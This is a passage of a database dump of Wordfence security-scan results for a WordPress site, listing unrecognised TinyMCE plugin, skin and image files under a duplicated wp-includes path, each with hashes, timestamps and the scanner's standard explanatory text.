your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77827,1675048853,1675048853,'new','knownfile',75,'3b255fa6edcdda4b25a07d7cdc869e10','e262b1d3b59ece807c8ad522dbac9e9e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77828,1675048853,1675048853,'new','knownfile',75,'586be478fc1839f7769fd94fc1c3987e','92c0c587f886918f4c1517b025785d0c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77829,1675048853,1675048853,'new','knownfile',75,'9d5f168fd40cc133027c00bce01990e3','0b66f881b02c0d0010ccacb48620270f','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77830,1675048853,1675048853,'new','knownfile',75,'33e3a69c557575f610d99187c8342ba3','990df6f55e6bff6687c35f3b8c445044','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77831,1675048853,1675048853,'new','knownfile',75,'bce0ee7b688816ee5fd6bc1f870d1efa','46392b6cde9b8b16993fc0c993101ed1','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77832,1675048853,1675048853,'new','knownfile',75,'8bbf830db6323fc9e2c1975c5e96b949','fab55ca52212387f473794130449a701','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77833,1675048853,1675048853,'new','knownfile',75,'877aeb8ff407d397358cae64ecb55038','c8b11198956d6d0834358634a2ecf795','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77834,1675048853,1675048853,'new','knownfile',75,'352bdab8bc9789ce8df95915cec6fe55','4987ccf7ac14b98cdd000bb02b60743d','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77835,1675048853,1675048853,'new','knownfile',75,'b9eb054205db8c866d245e6460ab7a8b','b5367086ae06fe3370321991624e8579','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77836,1675048853,1675048853,'new','knownfile',75,'e99f7a2cdf1f940e27d8d6ecffbd3dd4','a69bedee5046b7551778b1a4f615db7b','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77837,1675048853,1675048853,'new','knownfile',75,'f7323493d973cb72107929cd421339dc','c1cda47073fd60ba6eb379515c3800a5','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77838,1675048853,1675048853,'new','knownfile',75,'54eaef8df1244ac356dab5eafb87ea15','f77d4b4f5551cd17cdc33ee9caee5b29','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77839,1675048854,1675048854,'new','knownfile',75,'184769459501affd88e4c3368b30c80d','771b8184d8f819662bb2ef86a51d2efb','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77840,1675048854,1675048854,'new','knownfile',75,'8780df2e6401acd3f6c34ceb56fb77c3','70b36efdee05e862fd0bda85590bc71a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77841,1675048854,1675048854,'new','knownfile',75,'2353ae9dd05f4a962112c8dfb6cc0e6b','922af3a95fc30dfca77cfb7662e5216d','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77842,1675048854,1675048854,'new','knownfile',75,'f1c8f016ca10038b4bed5cdfc26d5d5d','bcc88bfab3cba6ebda8dabb0ee71d809','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77843,1675048854,1675048854,'new','knownfile',75,'5712a53d779d2aa76a885ac9a9e071b9','69c7b851176ffc264dde52f6a0afc2db','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77844,1675048854,1675048854,'new','knownfile',75,'a21b625eb3c6bc6b221eaf678d138d41','291a62c01142e033f913c6b0b57a5551','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77845,1675048854,1675048854,'new','knownfile',75,'2b5ff4b3ff71121095654cdd24475018','74993d3cf6226fa688db17b230c76e0a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77846,1675048854,1675048854,'new','knownfile',75,'1236f02a118f63382c245969b98815d4','cba5760363e5fba47fa14b8551c3515d','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77847,1675048854,1675048854,'new','knownfile',75,'d745e619453228d7682a41d0bbd39e61','bb0fc45c9e03c0fb175c62d352b5a107','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77848,1675048854,1675048854,'new','knownfile',75,'0ce510e6244f7c3b41459f3ea5c085fa','cb4f6665b542571c12b89ea5c072ccf6','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77849,1675048854,1675048854,'new','knownfile',75,'78de2a97a8ca774e8b6a56e03bb93fd5','2975a6fbe678a26128d0dab4d1688e41','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77850,1675048854,1675048854,'new','knownfile',75,'a09b5a3b5a03c8b821e7712ffd86893a','31625bee1e283167b3f74c2059827b69','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77851,1675048854,1675048854,'new','knownfile',75,'ecc1927debca31bd81e0917921f64253','52239750a770fb82c5cb00c931066eda','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77852,1675048854,1675048854,'new','knownfile',75,'658215181b1698eb227d925cf531fa3c','4ab40af5cce893d46629d9314d0db2a6','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77853,1675048854,1675048854,'new','knownfile',75,'871f5875b18c2fdd66e893dcd92f732e','f965573b785df25b62697c6a927822bf','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77854,1675048854,1675048854,'new','knownfile',75,'56b54d198298a01e62845cd17117c263','554131c712898082dab52d9ab60990a4','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77855,1675048854,1675048854,'new','knownfile',25,'0789c1a33040d5d68e707b1c93a0c640','40d43bd1c1bb851b29b89efd303e12a6','Old WordPress core file not removed during update: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77856,1675048855,1675048855,'new','knownfile',75,'cf5308feae8f679131b0ae1e04176372','f598e42ee17745239bde9817d15b36a2','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77857,1675048855,1675048855,'new','knownfile',75,'129fc9eae1e1dbd54c15ead362ea640e','3d7f63025b9f8f2440b3f74561989f2c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77858,1675048855,1675048855,'new','knownfile',75,'4281b6a1c14fac05cf7ffd780d4ccd22','9fdf77f05c5a4e319607225f474c7a5a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:75:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77859,1675048855,1675048855,'new','knownfile',75,'a09d92dfd9ce1b26b427a82127b85229','ab551f21ba130c3df9a4429069777a77','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77860,1675048855,1675048855,'new','knownfile',75,'86ece52012af20c180c96cb5dba800b3','a99701ff751bfd9255aa6d71ec92a5d6','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77861,1675048855,1675048855,'new','knownfile',75,'2bd3c4730202336a92de1a48d9963119','100b9afb885110165939cfcbe4a9939b','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77862,1675048855,1675048855,'new','knownfile',75,'e5d3b702214be9e437b0af2dffe859a4','f145a05834779ba825b5a191bc1140e8','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a 